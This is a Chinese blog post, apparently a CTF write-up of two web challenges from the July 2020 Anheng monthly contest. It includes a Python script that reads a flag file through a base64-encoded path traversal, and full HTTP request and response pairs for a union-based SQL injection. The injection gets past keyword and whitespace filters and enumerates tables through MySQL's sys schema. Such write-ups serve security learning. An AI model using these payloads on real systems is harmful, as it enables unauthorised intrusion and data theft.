安恒月赛20200725

web

字数统计: 865阅读时长: 4 min

 2020/07/25   Share

web

include

https://www.gem-love.com/ctf/2161.html

对此题感到无语,真一点提示都没有吗 Orz

# coding=UTF-8
import time 
import requests
import base64
url = "http://183.129.189.60:10009/image.php?t={}&f=ZGF0YTovLy4uLy4uLy4uLy4uLy4uLy4uL2ZsYWc=".format(int(time.time()))
headers = {"X-forwarded-For":"127.0.0.1"}
filename = "1.txt"
print(url)
print(int(time.time()))
res  =  requests.get(url,headers=headers)

#f = open(filename, 'w')
#f.write(res.text)
#f.close()

print(res.text)


#  Z3F5LmpwZw==     gqy.jpg
# 
#  y1ng://happyctf.com/../../../../../../flag
#  data://../../../../../../flag

sqli

推荐阅读

https://www.smi1e.top/新春战疫公益赛-ezsqli-出题小记/

无需“in”的SQL盲注

聊一聊bypass information_schema

alternatives-to-extract-tables-and-columns-from-mysql-and-mariadb

过滤参数

1	return preg_match("/;\|benchmark\|\^\|if\|[\s]\|in\|case\|when\|sleep\|auto\|desc\|stat\|\\|\|lock\|or\|and\|&\|like\|-\|`/i", $id); // [\s] \s是指空白bai，包括空格、换行、tab缩进等所有的空白

并且可以根据回参得知有三个参数,也可以一个个试(比如我,一开始没意识到这点)

database_name

GET /?id=0%27/**/union/**/select/**/database(),database(),database()/**/limit/**/0,1%23 HTTP/1.1
Host: 183.129.189.60:10004
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.26 Safari/537.36 Edg/85.0.564.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

HTTP/1.1 200 OK
Date: Sat, 25 Jul 2020 04:53:01 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 137
Connection: close
Content-Type: text/html; charset=UTF-8

Array
(
    [0] => sqlidb
    [id] => sqlidb
    [1] => sqlidb
    [username] => sqlidb
    [2] => sqlidb
    [password] => sqlidb
)
<br>

表名

先从当前数据库入手

因为过滤了in 和auto,所以information_schema数据库不行,sys中的带该字符串的表也不行,当然写也不行

GET /?id=0%27/**/union/**/select/**/1,(select/**/group_concat(object_name)/**/from/**/sys.x$schema_tables_with_full_table_scans/**/where/**/object_schema=database()),3%23 HTTP/1.1
Host: 183.129.189.60:10004
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.26 Safari/537.36 Edg/85.0.564.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


HTTP/1.1 200 OK
Date: Sat, 25 Jul 2020 06:06:52 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 137
Connection: close
Content-Type: text/html; charset=UTF-8

Array
(
    [0] => 1
    [id] => 1
    [1] => users,flllaaaggg
    [username] => users,flllaaaggg
    [2] => 3
    [password] => 3
)
<br>

列名

这个卡了很久,但结束也没想到

一开始的想法,是想用微笑师傅的方法通过直接比较键值来爆破出flag,而且还天真的以为只有一例,用下面的payload进行尝试,发现不是一列的表。

1	0'//union//select//(select//SUBSTR((SELECT/*///FROM//flllaaaggg),1,4)='flag'),1,1//from//flllaaaggg//limit//0,1%23

后来猜是有两列且只有一条数据时,发现遇到一个问题,我依然还得知道表结构才行。

此外,上面的方法遇到多列、多行数据时,效率不是很好,以下为举例:

之后看了Y1ng师傅题解时,顿时感觉自己是 🦈🖊,为什么自己不多试试 5555

原文作者：fe1w0

原文链接：https://fe1w0.github.io/2020/07/25/%E5%AE%89%E6%81%92%E6%9C%88%E8%B5%9B20200725/

发表日期：July 25th 2020, 3:56:40 pm

更新日期：March 15th 2021, 12:22:11 am

Next Post

CyBRICS CTF 2020
Previous Post

php_curl与docker_remote_api

CATALOG

1. web
1. 1.1. include
2. 1.2. sqli



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true